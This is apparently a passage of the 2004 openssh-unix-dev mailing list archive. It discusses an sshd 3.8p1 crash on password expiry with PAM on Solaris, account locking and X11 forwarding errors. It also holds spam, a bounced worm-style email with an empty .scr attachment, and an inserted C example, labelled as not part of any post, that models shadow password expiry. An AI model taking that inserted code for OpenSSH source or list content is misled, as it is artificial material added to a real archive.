From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 19:32:02 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A38EA.4070905@zip.com.au> Message-ID: <009601c40d49$9911f0c0$5bd90680@acsdev78> UsePAM=yes. Here is the debug ******************************** bash-2.05# /usr/local/sbin/sshd -ddd debug2: read_server_config: filename /usr/local/etc/sshd_config debug1: sshd version OpenSSH_3.8p1 debug1: private host key: #0 type 0 RSA1 debug3: Not a RSA1 key file /usr/local/etc/ssh_host_rsa_key. debug1: read PEM private key done: type RSA debug1: private host key: #1 type 1 RSA debug3: Not a RSA1 key file /usr/local/etc/ssh_host_dsa_key. debug1: read PEM private key done: type DSA debug1: private host key: #2 type 2 DSA debug1: Bind to port 22 on ::. Server listening on :: port 22. debug1: Bind to port 22 on 0.0.0.0. Server listening on 0.0.0.0 port 22. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. 
Connection from <...> port 4116 debug1: Client protocol version 1.99; client software version 3.2.9 SSH Secure Shell for Windows debug1: no match: 3.2.9 SSH Secure Shell for Windows debug1: Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-1.99-OpenSSH_3.8p1 debug3: privsep user:group debug1: permanently_set_uid: debug1: list_hostkey_types: ssh-rsa,ssh-dss debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,r ijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,r ijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hm ac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hm ac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss,ssh-rsa,x509v3-sign-dss,x509v3-sign-rsa debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour debug2: kex_parse_kexinit: hmac-md5,hmac-sha1 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1 debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found 
hmac-md5 debug1: kex: client->server aes128-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: server->client aes128-cbc hmac-md5 none debug2: Network child is on pid 5318 debug3: preauth child monitor started debug3: mm_request_receive entering debug2: dh_gen_key: priv key bits set: 131/256 debug2: bits set: 504/1024 debug1: expecting SSH2_MSG_KEXDH_INIT debug2: bits set: 527/1024 debug3: mm_key_sign entering debug3: mm_request_send entering: type 4 debug3: monitor_read: checking request 4 debug3: mm_answer_sign debug3: mm_answer_sign: signature 758b8(55) debug3: mm_request_send entering: type 5 debug2: monitor_read: 4 used once, disabling now debug3: mm_request_receive entering debug3: mm_key_sign: waiting for MONITOR_ANS_SIGN debug3: mm_request_receive_expect entering: type 5 debug3: mm_request_receive entering debug2: kex_derive_keys debug2: set_newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug2: set_newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: KEX done debug1: userauth-request for user dberezin service ssh-connection method none debug1: attempt 0 failures 0 debug3: mm_getpwnamallow entering debug3: mm_request_send entering: type 6 debug3: monitor_read: checking request 6 debug3: mm_answer_pwnamallow debug3: mm_answer_pwnamallow: sending MONITOR_ANS_PWNAM: 1 debug3: mm_request_send entering: type 7 debug2: monitor_read: 6 used once, disabling now debug3: mm_request_receive entering debug3: mm_getpwnamallow: waiting for MONITOR_ANS_PWNAM debug3: mm_request_receive_expect entering: type 7 debug3: mm_request_receive entering debug2: input_userauth_request: setting up authctxt for dberezin debug3: mm_start_pam entering debug3: mm_request_send entering: type 45 debug3: monitor_read: checking request 45 debug1: PAM: initializing for "dberezin" debug3: mm_inform_authserv entering debug3: mm_request_send entering: type 3 debug2: input_userauth_request: try method none debug3: mm_auth_password entering 
debug3: mm_request_send entering: type 10 debug3: mm_auth_password: waiting for MONITOR_ANS_AUTHPASSWORD debug3: mm_request_receive_expect entering: type 11 debug3: mm_request_receive entering debug3: Trying to reverse map address <...>. debug1: PAM: setting PAM_RHOST to "<...>" debug1: PAM: setting PAM_TTY to "ssh" debug2: monitor_read: 45 used once, disabling now debug3: mm_request_receive entering debug3: monitor_read: checking request 3 debug3: mm_answer_authserv: service=ssh-connection, style= debug2: monitor_read: 3 used once, disabling now debug3: mm_request_receive entering debug3: monitor_read: checking request 10 debug3: mm_answer_authpassword: sending result 0 debug3: mm_request_send entering: type 11 Failed none for dberezin from <...> port 4116 ssh2 debug3: mm_request_receive entering debug3: mm_auth_password: user not authenticated Failed none for dberezin from <...> port 4116 ssh2 debug1: userauth-request for user dberezin service ssh-connection method password debug1: attempt 1 failures 1 debug2: input_userauth_request: try method password debug3: mm_auth_password entering debug3: mm_request_send entering: type 10 debug3: mm_auth_password: waiting for MONITOR_ANS_AUTHPASSWORD debug3: mm_request_receive_expect entering: type 11 debug3: mm_request_receive entering debug3: monitor_read: checking request 10 debug3: auth_shadow_pwexpired: today 12496 sp_lstchg 0 sp_max -1 User dberezin password has expired (root forced) debug3: mm_answer_authpassword: sending result 1 debug3: mm_request_send entering: type 11 debug3: mm_request_receive_expect entering: type 46 debug3: mm_request_receive entering debug3: mm_auth_password: user authenticated debug3: mm_do_pam_account entering debug3: mm_request_send entering: type 46 debug3: mm_request_receive_expect entering: type 47 debug3: mm_request_receive entering debug3: PAM: do_pam_account pam_acct_mgmt = 10 debug3: pam_password_change_required 1 debug1: do_cleanup debug1: PAM: cleanup debug3: PAM: 
sshpam_thread_cleanup entering Segmentation Fault (core dumped) bash-2.05# -Dmitry. From dtucker at zip.com.au Fri Mar 19 11:38:57 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:38:57 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009601c40d49$9911f0c0$5bd90680@acsdev78> References: <009601c40d49$9911f0c0$5bd90680@acsdev78> Message-ID: <405A4121.2050008@zip.com.au> Dmitry Berezin wrote: > UsePAM=yes. Here is the debug [snip] > debug3: pam_password_change_required 1 > debug1: do_cleanup > debug1: PAM: cleanup > debug3: PAM: sshpam_thread_cleanup entering > Segmentation Fault (core dumped) Yep, that's bug #808. Expiry will work OK if you set UsePAM=no. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From kmack at sgi.sk.ca Fri Mar 19 11:38:58 2004
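The behaviour discussed in this thread, as an added example that is not OpenSSH source and not part of any post: a small C model of the shadow expiry decision behind the `auth_shadow_pwexpired` debug line, gated by authentication method as described above for 3.8p1 with UsePAM=no. The struct, the function names, the `locked` flag and the two extra log lines are assumptions constructed for illustration; the aged-password comparison is the usual shadow aging rule.

```c
#include <stdio.h>
#include <string.h>

/* Shadow aging fields in days since the epoch (constructed model, not struct spwd). */
struct shadow_fields {
    long lstchg;   /* day of last password change; 0 = change forced by root */
    long max;      /* maximum password age in days; -1 = aging disabled */
};

enum expiry   { PW_VALID = 0, PW_ROOT_FORCED = 1, PW_AGED = 2 };
enum decision { PARSE_ERROR = -1, ALLOW = 0, DENY_LOCKED = 1, MUST_CHANGE = 2 };

/* The debug3 line from the server log in this thread. */
static const char PAGE_LINE[] =
    "debug3: auth_shadow_pwexpired: today 12496 sp_lstchg 0 sp_max -1";
/* Constructed lines in the same format: one aged password, one still valid. */
static const char AGED_LINE[] =
    "debug3: auth_shadow_pwexpired: today 12496 sp_lstchg 12400 sp_max 90";
static const char FRESH_LINE[] =
    "debug3: auth_shadow_pwexpired: today 12496 sp_lstchg 12450 sp_max 90";

/* Classify a password from its shadow aging fields. */
enum expiry shadow_expiry(const struct shadow_fields *sp, long today)
{
    if (sp->lstchg == 0)
        return PW_ROOT_FORCED;              /* what 'passwd -f' produces in the log above */
    if (sp->max != -1 && today > sp->lstchg + sp->max)
        return PW_AGED;
    return PW_VALID;
}

/* Pull today/sp_lstchg/sp_max out of a debug3 line; returns 1 on success. */
int parse_pwexpired_line(const char *line, long *today, struct shadow_fields *sp)
{
    const char *p = strstr(line, "auth_shadow_pwexpired:");
    if (p == NULL)
        return 0;
    return sscanf(p, "auth_shadow_pwexpired: today %ld sp_lstchg %ld sp_max %ld",
                  today, &sp->lstchg, &sp->max) == 3;
}

/* Per the thread: only these two methods consult password expiry in 3.8p1. */
static int method_checks_expiry(const char *method)
{
    return strcmp(method, "password") == 0 ||
           strcmp(method, "keyboard-interactive") == 0;
}

/* Account locking applies to every method; expiry only to password-based ones. */
enum decision login_decision(const char *method, int locked,
                             const struct shadow_fields *sp, long today)
{
    if (locked)
        return DENY_LOCKED;
    if (method_checks_expiry(method) && shadow_expiry(sp, today) != PW_VALID)
        return MUST_CHANGE;
    return ALLOW;
}

/* Convenience wrapper: parse a log line, then decide for the given method. */
enum decision decision_for_line(const char *method, int locked, const char *line)
{
    struct shadow_fields sp;
    long today;

    if (!parse_pwexpired_line(line, &today, &sp))
        return PARSE_ERROR;
    return login_decision(method, locked, &sp, today);
}

int main(void)
{
    static const char *methods[] = { "password", "keyboard-interactive",
                                     "publickey", "hostbased" };
    static const char *names[] = { "allow", "deny (locked)", "must change password" };
    size_t i;

    for (i = 0; i < sizeof(methods) / sizeof(methods[0]); i++)
        printf("%-22s expired, unlocked: %-22s expired, locked: %s\n", methods[i],
               names[decision_for_line(methods[i], 0, PAGE_LINE)],
               names[decision_for_line(methods[i], 1, PAGE_LINE)]);
    return 0;
}
```

For an account whose password was expired with 'passwd -f', the model allows public-key and hostbased logins and only forces a change on password or keyboard-interactive logins, which is why locking rather than expiry is the control that covers every method.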
From: kmack at sgi.sk.ca (Kevin Mack) Date: Thu, 18 Mar 2004 18:38:58 -0600 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A3B0A.30101@zip.com.au> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> <20040318234615.GA22990@gibraltar> <405A3B0A.30101@zip.com.au> Message-ID: <20040319003858.GA23358@gibraltar> On Fri, Mar 19, 2004 at 11:12:58AM +1100, Darren Tucker wrote: > Kevin Mack wrote: > >On Fri, Mar 19, 2004 at 10:15:35AM +1100, Darren Tucker wrote: > >>I posted a more details explanation of the differences a while back: > >>http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 > > > >Thanks Darren, we'll use 3.7.1p2 for now. > > Do you need password expiry for non-password authentications? Umm, strictly speaking, no. We use both public-key and password authentications and find it more convenient to have password expiry on all accounts, and easier to lock them with 'passwd -l'. From dtucker at zip.com.au Fri Mar 19 11:47:15 2004 
From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:47:15 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <20040319003858.GA23358@gibraltar> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> <20040318234615.GA22990@gibraltar> <405A3B0A.30101@zip.com.au> <20040319003858.GA23358@gibraltar> Message-ID: <405A4313.2040603@zip.com.au> Kevin Mack wrote: > On Fri, Mar 19, 2004 at 11:12:58AM +1100, Darren Tucker wrote: >>Do you need password expiry for non-password authentications? > > Umm, strictly speaking, no. We use both public-key and password > authentications and find it more convenient to have password > expiry on all accounts, and easier to lock them with 'passwd -l'. Since about 3.7p1, sshd will honour "passwd -l" locking of accounts for any auth method as long as UsePAM=no. (When UsePAM=yes, those checks are delegated to PAM, and I believe its behaviour depends on which Solaris patches you have installed). -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dberezin at acs.rutgers.edu Fri Mar 19 12:02:07 2004 
From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 20:02:07 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A4121.2050008@zip.com.au> Message-ID: <009701c40d4d$cd474760$5bd90680@acsdev78> > Yep, that's bug #808. Expiry will work OK if you set UsePAM=no. UsePAM=no works fine. I have some strange problem while running sshd in debug mode, though. If I login to the server with Gnome 2.0 desktop as a regular user, su to root, and then run sshd -ddd, then when some other user with expired password tries to login and sshd tries to change password for that user, I get an error message: WARNING: Your password has expired. You must change your password now and login again! passwd: Changing password for Permission denied If I just ssh into the box and start sshd -ddd on some other port, the problem does not occur. I will do some more tests tomorrow and post more precise info about this. (It's late and I might be doing something wrong) -Dmitry. > > -- > Darren Tucker (dtucker at zip.com.au) > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > Good judgement comes with experience. Unfortunately, the experience > usually comes from bad judgement.. From kumaresh_ind at gmx.net Fri Mar 19 21:04:36 2004 
From: kumaresh_ind at gmx.net (Kumaresh)
Date: Fri, 19 Mar 2004 15:34:36 +0530
Subject: rsa_public_encrypt : exponent too small or not odd error with SSH-1 with OpenSSL0.9.7d
Message-ID: <004101c40d99$a1e6a060$230110ac@kurco>

Hello,

I have compiled OpenSSL-0.9.7d - the latest version and when OpenSSH-3.7.1p2 is compiled with this ssl library [0.9.7d], I am getting the following error when SSH-1 connection is done. I am using HP-UX IPF box and I am doing 32 bit compilation only. Even I have changed the optimization level for OpenSSL and no use. Any clue why this problem is occurring?

Advance thanks,
Kumaresh

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004

From MAILER-DAEMON at anet-mail20.anet.ne.jp Fri Mar 19 23:01:25 2004
From: MAILER-DAEMON at anet-mail20.anet.ne.jp (MAILER-DAEMON at anet-mail20.anet.ne.jp)
Date: 19 Mar 2004 21:01:25 +0900
Subject: failure notice
Message-ID: <20040319120120.C5AA327C187@shitei.mindrot.org>

Hi. This is the qmail-send program at anet-mail20.anet.ne.jp.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

: sqlforward: fatal: This address not registered

--- Below this line is a copy of the message.

Return-Path:
Received: (qmail 5006 invoked by uid 0); 19 Mar 2004 21:01:20 +0900
Received: from unknown (HELO anet.ne.jp) (200.233.66.132) by mail20.anet.ne.jp with SMTP; 19 Mar 2004 21:01:20 +0900
From: openssh-unix-dev at mindrot.org
To: sancyo at anet.ne.jp
Subject: File is self-decryting.
Date: Fri, 19 Mar 2004 09:01:26 -0300
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0009_0000133F.000042A1"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

------=_NextPart_000_0009_0000133F.000042A1
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit

that's not the truth?

------=_NextPart_000_0009_0000133F.000042A1
Content-Type: application/octet-stream; name="visa_party.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="visa_party.scr"

------=_NextPart_000_0009_0000133F.000042A1--

From chemical-market at 163.com Tue Mar 9 14:05:34 2004
From: chemical-market at 163.com (Mr.Wang) Date: Tue, 09 Mar 2004 11:05:34 +0800 Subject: Chemical products : Sr Salt Chemical series Message-ID: <20040319153538.54EFC27C187@shitei.mindrot.org> Chemical products : STRONTIUM HYDROXIDE OCTAHYDRATEM > > > Chongqing Xianfeng Sr Salt Chemical Co., Ltd.-- > a Sino-Japan joint venture established in 1995, is engaged in developing, manufacturing and trading of strontium salt products. Enjoying self import and export right, preferential policy for foreign-invested venture, advantage in production scale, technology and production structure, the company acts as an important manufacturer and distributor of Sr salt in the country. Its chemical factory is located at the foot of the beautiful Bayue Mountain, occupying 2.33 hectare, with annual output of strontium carbonate 4500t, and 3000t of strontium nitrate, strontium hydroxide, strontium chloride, strontium sulfate, strontium ethanoic, etc. The factory owns total quality control(TQC) system, strict administration and qualified technical team. Products produced with high technology is of good quality. For example, strontium carbonate has low contents of sulfur and calcium; strontium nitrate, strontium chloride and strontium hydroxide have low contents of Ba, Na and Ca. > > strontium salt > > 1. STRONTIUM HYDROXIDE OCTAHYDRATEMolecular formula: Sr(OH)2.8H2O97% Min.Properties: cubic crystal without color, the relative density is 1.90, be the substances when been heated to 100c.Use: separate cane sugar from gooey, refine of beet sugar, to make strontium salt, develop the dryness Properties of oil and oil paint. > > 2. STRONTIUM OXALATEmolecular formula : SrC2O4 .H2O99% Min.Properties: white crystal powder, lose crystal water when heated to 150c,dissolved in muriatic acid and nitric acid.Use: to make strontium salt.Packing: 25KG net plastic woven bags or as requested. > > 3. 
STRONTIUM ATETATmolecular formula : Sr(CH3COO)2.1/2H2O99.0% Min.molecular weightProperties: white crystal powder. Losecrystal water when heated to 150c,charcoaled under high temperature. Change to carbonic acid strontium after heated. dissolved in water, the water liquid is neuteal micro dissolved in ethanol .use: used in analysis reagent and medicine.Packing: 25KG net plastic woven bags or as requested. > > 4.STRONTIUM FLUORIDEmolecular formula : SrF2Properties: white powder, dissolved in 8500 times water, micro dissolved in muriatic acid ,cannot dissolved in hydrofluoric acid and propyliodone.Use: used in making medicine to substitute other fluorid. Packing: 25KG net plastic woven bags or as requested. > > 5.STRONTIUM CARBONATE HIGH PURITYProperties: white powder, dissolved in rare muriatic acid and rare nitric acid and give out CO2,micro dissolved in water contain CO2 and ammonia salt liquor, cannot dissolved in water. decompose to CO2 and oxidation strontium when heated to 900c.Use: electron component, skyrocket material, to make rainbow glass, and other strontium salt preparation > 6.STRONTIUM CHROMATEProperties: yellow crystal or powder. dissolved in muriatic acid ,nitric acid ,acetic acid and ammonia, micro dissolved in water. be oxidative, be poison.Use: oxidant, glass, ceramic industry.Packing: 25KG net plastic woven bags or as requested. > > 7.STRONTIUM PEROXIDEProperties: white or canary powder , cannot dissolved in water, dissolved in rare acid and create hydrogen peroxide.Use: used in the mixture of fireworks.packing: 25KG net plastic woven bags or as requested. 
> > 8.STRONTIUM CARBONATE IN GRANULARProperties: white powder, dissolved in rare muriatic acid and rare nitric acid and give out CO2,micro dissolved in water contain CO2 and ammonia salt liquor, cannot dissolved in water Decompose to CO2 and oxidation strontium when heated to 900c.Use: electron component, skyrocket material, to make rainbow glass, and other strontium salt preparation.Molecular formula : SrCO3 +BaCO3 98.0% MIN.Packing: 1000KG flexible container bag or as requested.1>Properties: similar to strontium carbonate powder 2>Uses: similar to strontium carbonate powder3>Specifications: SrCO3 + BaCO3 98%min 4>Packing: 1000kg bag > > 9.STRONTIUM HYDRATE PHOSPHATEmolecular formula : SrHPO4 99% Min molecular weight: 183.62Properties: white powder, dissolved in muriatic acid and nitric acid and cannot dissolved in water and alcohol ketone.Use: used in medicine industry and analysis reagent, can be used to shine material .packing: 25KG net plastic woven bags or as requested > > 10.STRONTIUM PHOSPHATEmolecular formula : Sr3(PO4)2Properties: white powder, dissolved in 1536c,cannot dissolved in water ,dissolved in muriatic acid and nitric acid.Use: used in electron industry and medicine industry.packing : 25KG net plastic woven bags or as requested > > 11.STRONTIUM SALFATEB 99% MIN.C 97% MIN.Use: white crystal powder, rare dissolved in dense acid, rare dissolved in water ,cannot dissolved in alcohol and rare vitriolUse: analysis reagent ,the saturation liquor mensurate barium, red flame. > > 12.STRONTIUM CHLORIDE HEXAHYDRATE? common hexahydrate chloridize strontium(SrCl2.6H2O 99.0% Min.)Properties: white pin shape crystal. taste bitter, airslake in dry wind, deliquescence in wet air. dissolved in water ,rare dissolved in ethanol and acet. 
lose 4 molecule crystal water when heated to 61.4c,to be monohydrate salt on 100c.melting point:115c.dampproof,airproof saved.Use: medicine industry ,domestic industry, strontium salt preparation.Packing: 25KG net plastic woven bags or as requested. ? high pure hexahydrate chloridize strontiumPacking: 25KG net plastic woven bags or as requested.(SrCl2.6H2O 99.0 ~ 103.0% > > 13.STRONTIUM TETRABORATEmolecular formula : SrB4O7 99% Min. Properties: white powder, cannot dissolved in water, dissolved in muriatic acid and nitric acid.Use: in porcelain enamel industry and glass industry. > > 14. STRONTIUM CARBONATE POWDERProperties: white powder, dissolved in rare muriatic acid and rare nitric acid and give out CO2, micro dissolved in water contain CO2 and ammonia salt liquor, cannot dissolved in water.decompose to CO2 and oxidation strontium when heated to 900c.Use: electron component, skyrocket material, to make rainbow glass, and other strontium salt preparation.? carbonic acid strontium in powder.(SrCO3 97.5% Min.)Packing: Plastic woven bag of net 25KG or as requested. ? carbonic acid strontium in powder.(SrCO3 98% Min.)Packing: Plastic woven bag of net 25KG or as requested. ? carbonic acid strontium in powder.(SrCO3 98.5% MIN.)Packing: Plastic woven bag of net 25KG or as requested. > > 15.STRONTIUM NITRATEProperties: white grain or powder. dissolved in water, rare dissolved in ethanol. Oxidation. Mixed with organics will self-ignite and explode. Use: fireworks .Communication signal in sea and on land. match.? nitric acid strontium I type(SR(NO3)2 99% Min.)Packing: 25KG net plastic woven bags or as requested. ? nitric acid strontium II type(SR(NO3)2 99% Min.)Packing: 25KG net plastic woven bags or as requested ? 
From dberezin at acs.rutgers.edu Sat Mar 20 03:05:46 2004
From: dberezin at acs.rutgers.edu (Dmitry Berezin)
Date: Fri, 19 Mar 2004 11:05:46 -0500
Subject: 3.8p1 password expiry, Solaris 8
In-Reply-To: <009701c40d4d$cd474760$5bd90680@acsdev78>
Message-ID: <000901c40dcc$0a463800$5bd90680@acsdev78>

I was able to replicate this problem, but only in the same window, that I
have had opened since yesterday. After logging out of Gnome desktop and
logging back in, I can no longer produce the same results. Most likely it
was some combination of "su"s in the same session, but again, I am unable to
replicate it anymore.
"passwd", when called without any arguments, will try to change password of
the originally logged in user, so in my case when sshd called passwd, it was
somehow referring back to the account that logged into the desktop.

Although, something like that would probably be a very rare case (and
probably while testing), would it be safer to call passwd
instead?

-Dmitry.

> -----Original Message-----
> From: openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org
> [mailto:openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org] On
> Behalf Of Dmitry Berezin
> Sent: Thursday, March 18, 2004 8:02 PM
> To: 'Darren Tucker'
> Cc: openssh-unix-dev at mindrot.org
> Subject: RE: 3.8p1 password expiry, Solaris 8
>
> > Yep, that's bug #808. Expiry will work OK if you set UsePAM=no.
>
> UsePAM=no works fine.
>
> I have some strange problem while running sshd in debug mode, though. If I
> login to the server with Gnome 2.0 desktop as a regular user, su to root,
> and then run sshd -ddd, then when some other user with expired password
> tries to login and sshd tries to change password for that user, I get an
> error message:
>
> WARNING: Your password has expired.
> You must change your password now and login again!
> passwd: Changing password for
> Permission denied
>
> If I just ssh into the box and start sshd -ddd on some other port, the
> problem does not occur.
>
> I will do some more tests tomorrow and post more precise info about this.
> (It's late and I might be doing something wrong)
>
> -Dmitry.
>
> >
> > --
> > Darren Tucker (dtucker at zip.com.au)
> > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
> > Good judgement comes with experience. Unfortunately, the experience
> > usually comes from bad judgement..
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

From andreas at conectiva.com.br Sat Mar 20 04:54:32 2004
From: andreas at conectiva.com.br (Andreas)
Date: Fri, 19 Mar 2004 14:54:32 -0300
Subject: X forwarding and BadWindow error
Message-ID: <20040319175432.GD2062@conectiva.com.br>

Has anybody else experienced weird X11 forwarding problems such
as the one below:

andreas at teste10:~> x3270
X Error of failed request: BadWindow (invalid Window parameter)
  Major opcode of failed request: 3 (X_GetWindowAttributes)
  Resource id in failed request: 0x404372
  Serial number of failed request: 833
  Current serial number in output stream: 834

or

andreas at teste10:~> gq

Gdk-ERROR **: BadWindow (invalid Window parameter)
  serial 737 error_code 3 request_code 38 minor_code 0
Gdk-ERROR **: BadAccess (attempt to access private resource denied)
  serial 738 error_code 10 request_code 102 minor_code 0

The application opens, but crashes with this error when I open a menu.

Without ssh (that is, using export DISPLAY=mymachine:0), it works.

My XFree86 version is 4.4.0, and openssh is 3.8p1. Trying from older XFree86
and openssh, it works. I couldn't isolate it yet, whether the problem is with
X or openssh (or something else).

From Sergio.Gelato at astro.su.se Sat Mar 20 10:03:35 2004
From: Sergio.Gelato at astro.su.se (Sergio Gelato)
Date: Sat, 20 Mar 2004 00:03:35 +0100
Subject: X forwarding and BadWindow error
In-Reply-To: <20040319175432.GD2062@conectiva.com.br>
References: <20040319175432.GD2062@conectiva.com.br>
Message-ID: <20040319230335.GA4206@astro.su.se>

* Andreas [2004-03-19 14:54:32 -0300]:
> Has anybody else experienced weird X11 forwarding problems such
> as the one below:

Yes. The problem is that OpenSSH 3.8 is trying to pioneer the use of the
X11 SECURITY extension, which has existed since 1996 but obviously
not received enough debugging attention so far.

> andreas at teste10:~> x3270
> X Error of failed request: BadWindow (invalid Window parameter)
> Major opcode of failed request: 3 (X_GetWindowAttributes)
> Resource id in failed request: 0x404372

What's that window x3270 is trying to get the attributes of? (xwininfo
might help.) Then either patch x3270 not to need this lookup, or launch
the ssh client with ForwardX11Trusted=yes.

If the opcode had been one of the X_*Property ones, you would have had
the option of allowing (or silently ignoring) the access attempt in the
SecurityPolicy file of your X server configuration. But I'm afraid that
X_GetWindowAttributes restrictions are hardwired (in the X server
implementations I have access to). There may be very good design reasons
for hardwiring them, too.

Advice: for the sake of ordinary users, set
    ForwardX11Trusted yes
in ssh_config. As a developer, you can turn it off in your ~/.ssh/config,
study what breaks, and try to help the maintainers of the affected
applications improve their SECURITY-compatibility so that maybe someday
we'll all be able to turn ForwardX11Trusted back off.

From djm at mindrot.org Sat Mar 20 10:07:59 2004
From: djm at mindrot.org (Damien Miller)
Date: Sat, 20 Mar 2004 10:07:59 +1100
Subject: X forwarding and BadWindow error
In-Reply-To: <20040319175432.GD2062@conectiva.com.br>
References: <20040319175432.GD2062@conectiva.com.br>
Message-ID: <405B7D4F.6090807@mindrot.org>

Andreas wrote:
> Has anybody else experienced weird X11 forwarding problems such
> as the one below:
>
> andreas at teste10:~> x3270
> X Error of failed request: BadWindow (invalid Window parameter)
> Major opcode of failed request: 3 (X_GetWindowAttributes)
> Resource id in failed request: 0x404372
> Serial number of failed request: 833
> Current serial number in output stream: 834

As of OpenSSH 3.8, X forwarding by default uses the XSECURITY extension
to limit access to the client's X server. You can disable this using the
ForwardX11Trusted option or you can adjust the server's policy
(/etc/X11/xserver/SecurityPolicy for XFree)

-d

From dtucker at zip.com.au Sat Mar 20 11:46:17 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sat, 20 Mar 2004 11:46:17 +1100
Subject: 3.8p1 password expiry, Solaris 8
In-Reply-To: <000901c40dcc$0a463800$5bd90680@acsdev78>
References: <000901c40dcc$0a463800$5bd90680@acsdev78>
Message-ID: <405B9459.3050206@zip.com.au>

Dmitry Berezin wrote:
> I was able to replicate this problem, but only in the same window, that I
> have had opened since yesterday. After logging out of Gnome desktop and
> logging back in, I can no longer produce the same results. Most likely it
> was some combination of "su"s in the same session, but again, I am unable to
> replicate it anymore.
> "passwd", when called without any arguments, will try to change password of
> the originally logged in user, so in my case when sshd called passwd, it was
> somehow referring back to the account that logged into the desktop.

Maybe something was fooling passwd about who the logged-on user was?
(wtmp entries or something?)

> Although, something like that would probably be a very rare case (and
> probably while testing), would it be safer to call passwd
> instead?

The problem with doing that is some platforms won't allow non-root users
to use "passwd username" even if the username supplied is the same as
the logged-in user.

$ whoami
dtucker
$ uname
Linux
$ passwd dtucker
passwd: Only root can specify a user name.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
    usually comes from bad judgement.

From dtucker at zip.com.au Sat Mar 20 16:26:27 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sat, 20 Mar 2004 16:26:27 +1100
Subject: rsa_public_encrypt : exponent too small or not odd error with SSH-1 with OpenSSL0.9.7d
In-Reply-To: <004101c40d99$a1e6a060$230110ac@kurco>
References: <004101c40d99$a1e6a060$230110ac@kurco>
Message-ID: <405BD603.9010308@zip.com.au>

Kumaresh wrote:
> I have compiled OpenSSL-0.9.7d - the latest version and when
> OpenSSH-3.7.1p2 is compiled with this ssl library [0.9.7d], I am getting the
> following error when SSH-1 connection is done.
> I am using HP-UX IPF box and
> I am doing 32 bit compilation only. Even I have changed the optimization
> level for OpenSSL and no use.

